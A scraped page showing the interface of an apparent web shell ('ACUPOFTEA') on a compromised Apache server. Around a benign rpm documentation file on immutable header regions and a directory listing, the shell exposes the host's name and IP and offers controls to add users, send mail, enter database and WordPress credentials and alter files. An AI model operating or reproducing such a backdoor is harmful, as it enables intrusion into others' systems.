System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
share
/
doc
/
rpm
/
216.73.216.38
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
hregions
/*! \page hregions Immutable header regions in rpm-4.0.1 and later The header data structure has changed in rpm-4.0.[12] to preserve the original header from a package. The goal is to keep the original header intact so that metadata can be verified separately from the payload by the RHN up2date client and by the rpm command line verify mode using signatures saved in the rpm database. I believe the change is entirely forward and backward compatible, and will not require any artifacts like changing the version number of packaging or adding an "rpmlib(...)" tracking dependency. We'll see ... Here's a short description of the change. An rpm header has three sections: \verbatim 1) intro (# entries in index, # bytes of data) 2) index 16 byte entries, one per tag, big endian 3) data tag values, properly aligned, big endian \endverbatim Representing sections in the header (ignoring the intro) with \verbatim A,B,C index entries sorted by tag number a,b,c variable length entry data | boundary between index/data \endverbatim a header with 3 tag/value pairs (A,a) can be represented something like \verbatim ABC|abc \endverbatim The change is to introduce a new tag that keeps track of a contiguous region (i.e. the original header). Representing the boundaries with square/angle brackets, an "immutable region" in the header thus becomes \verbatim [ABC|abc] \endverbatim or more generally (spaces added for clarity) \verbatim [ABC> QRS | <abc] qrs \endverbatim or with concatenated regions (not implemented yet) \verbatim [ABC> [DEF> QRS | <abc] <def] qrs \endverbatim or with nested regions (not implemented yet) \verbatim [ABC [DEF>> QRS | <<abc] def] qrs \endverbatim \todo Either concatenated/nested regions may be used to implement a metarpm, aka a package of packages, dunno how, when, or even if, yet. What complicates the above is legacy issues, as various versions of rpm have added/deleted/modified entries in the header freely. Thus, representing altered tag entries/data with a '.', there is a need to preserve deleted information something like \verbatim [A.C> QRS XYZ | <a.c] qrs xyz \endverbatim \note This is basically the change that replaces the filename with a {dirname,basename,dirindex} triple between rpm-3.x and rpm-4.x. or \verbatim [AB.> QRS D | <ab.] qrs d \endverbatim \note The header is no longer sorted because of replacing Cc with Dd. and yet permit retrieval of the original \verbatim [ABC|abc] \endverbatim region. PITA, really. What made header regions trickier yet is the desire to have an implementation that is both backward and forward compatible. I won't bore you with the tedious details. However, even after doing regressions against supported Red Hat releases, there's a Great Big Universe of rpm packages out there, and I'm *very* interested in hearing (as bug reports against rpm at http://bugzilla.redhat.com) about any and all problems with header regions in rpm-4.0.1. */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-12-18 10:57:28
..
DIR
-
drwxr-xr-x
2025-10-09 10:58:24
CREDITS
text/plain
2.61 KB
-rw-r--r--
2020-04-28 12:50:11
builddependencies
text/plain
6.34 KB
-rw-r--r--
2020-01-08 05:17:27
buildroot
text/x-tex
3.67 KB
-rw-r--r--
2020-01-08 05:17:27
conditionalbuilds
text/plain
3.96 KB
-rw-r--r--
2020-01-08 05:17:27
dependencies
text/x-tex
13.34 KB
-rw-r--r--
2020-04-28 12:50:11
format
text/x-tex
10.18 KB
-rw-r--r--
2020-01-08 05:17:27
hregions
text/plain
2.9 KB
-rw-r--r--
2017-08-09 03:23:43
macros
text/x-tex
9.33 KB
-rw-r--r--
2020-04-28 12:50:11
multiplebuilds
text/plain
1.82 KB
-rw-r--r--
2017-08-09 03:23:43
queryformat
text/x-tex
6.18 KB
-rw-r--r--
2020-04-28 12:50:11
relocatable
text/x-tex
1.98 KB
-rw-r--r--
2020-01-08 05:17:27
signatures
text/x-tex
2.57 KB
-rw-r--r--
2020-01-08 05:17:27
spec
text/x-tex
7.71 KB
-rw-r--r--
2020-04-28 12:50:11
triggers
text/x-tex
5.54 KB
-rw-r--r--
2020-04-28 12:50:11
tsort
text/x-tex
5.33 KB
-rw-r--r--
2020-01-08 05:17:27
~ ACUPOFTEA - mail.ontime-ae.com